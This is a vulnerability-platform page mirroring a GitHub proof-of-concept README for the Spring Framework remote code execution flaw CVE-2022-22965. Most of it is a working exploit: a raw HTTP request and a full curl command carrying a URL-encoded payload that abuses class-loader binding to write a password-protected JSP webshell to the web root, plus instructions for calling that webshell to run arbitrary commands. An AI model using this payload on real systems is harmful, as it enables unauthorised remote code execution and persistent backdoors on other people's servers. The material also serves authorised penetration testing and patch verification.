漏洞平台

POC详情： a200108d5f59d766aa7031cff821e40ca0d6877c

来源

https://github.com/alt3kx/CVE-2022-22965_PoC

关联漏洞

标题： Spring Framework 代码注入漏洞 (CVE-2022-22965)
描述：Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 Spring Framework 存在代码注入漏洞，该漏洞源于 JDK 9+ 上的数据绑定的 RCE。以下产品和版本受到影响：5.3.0 至 5.3.17、5.2.0 至 5.2.19、较旧的和不受支持的版本也会受到影响。

描述

Spring Framework RCE (Quick pentest notes)

介绍

# Spring Framework RCE exploitation (Quick pentest notes)

<p align="center">
  <img src="https://user-images.githubusercontent.com/3140111/161103421-31e0e81a-29bf-42e9-ae55-282ca5e9adc2.png">
</p>

Step 1: Find some endpoint in your target where is accepted POST/PUT methods + encode your payload (URL encode)

```
POST /path/upload HTTP/1.1
Host: <redacted>
Origin: <redacted>
Cookie: JSESSIONID=BE65B534335A5A2538624404C063B70C; 
Content-Type: application/x-www-form-urlencoded
User-Agent: alex666
c0: %>//
c1: Runtime
c2: <%
Connection: close

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7bc2%7di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7b%20java.io.InputStream%20in%20%3d%20%25%7bc1%7di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3b%20int%20a%20%3d%20-1%3b%20byte%5b%5d%20b%20%3d%20new%20byte%5b2048%5d%3b%20while((a%3din.read(b))!%3d-1)%7b%20out.println(new%20String(b))%3b%20%7d%20%7d%20%25%7bc0%7di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=webshell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
```
Step 2: Is better with Burp Free/Pro :

![image](https://user-images.githubusercontent.com/3140111/160967432-0b462017-9528-4849-836d-08b3cfe22976.png)

![image](https://user-images.githubusercontent.com/3140111/161083147-a71a48c6-e78e-47ec-bc51-07500f326a02.png)

Here the Payload Decoded: 

```
class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{c2}i if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{c0}i&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=webshell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
```

Step 3: Use curl commandliner and send your POST + payload to the targeted system: 

```ruby
$ curl -i -s -k -X $'POST' -H $'Host: <redacted>' -H $'Origin: <redacted>' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: alex666' -H $'c0: %>//' -H $'c1: Runtime' -H $'c2: <%' -H $'Connection: close' -b $'JSESSIONID=BE65B534335A5A2538624404C063B70C' --data-binary $'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7bc2%7di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7b%20java.io.InputStream%20in%20%3d%20%25%7bc1%7di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3b%20int%20a%20%3d%20-1%3b%20byte%5b%5d%20b%20%3d%20new%20byte%5b2048%5d%3b%20while((a%3din.read(b))!%3d-1)%7b%20out.println(new%20String(b))%3b%20%7d%20%7d%20%25%7bc0%7di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=webshell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=\x0d\x0a\x0d\x0a' $'http://<redacted>/path/upload' --proxy http://127.0.0.1:8080
```
Step 4: Your need await 10/15 seconds and call your webshell as follow: 
```
https://<redacted>/path/upload/webshell.jsp?pwd=j&cmd=id
````
Note: If you retry the payload too many times the webshell will be rewrite with new lines and special chars will be not scaped, is better change the name of your webshell and choose new PATH that not affect the currentl deployment.

References and Fixes : </br>
* https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/<br>
* https://github.com/BobTheShoplifter/Spring4Shell-POC </br>
* https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement</br>
* https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/</br>



[../to be continue]


# Author
Alex Hernandez aka <em><a href="https://twitter.com/_alt3kx_" rel="nofollow">(@\_alt3kx\_)</a></em>

文件快照


 [4.0K]  /data/pocs/a200108d5f59d766aa7031cff821e40ca0d6877c
├── [ 34K]  LICENSE
└── [4.2K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。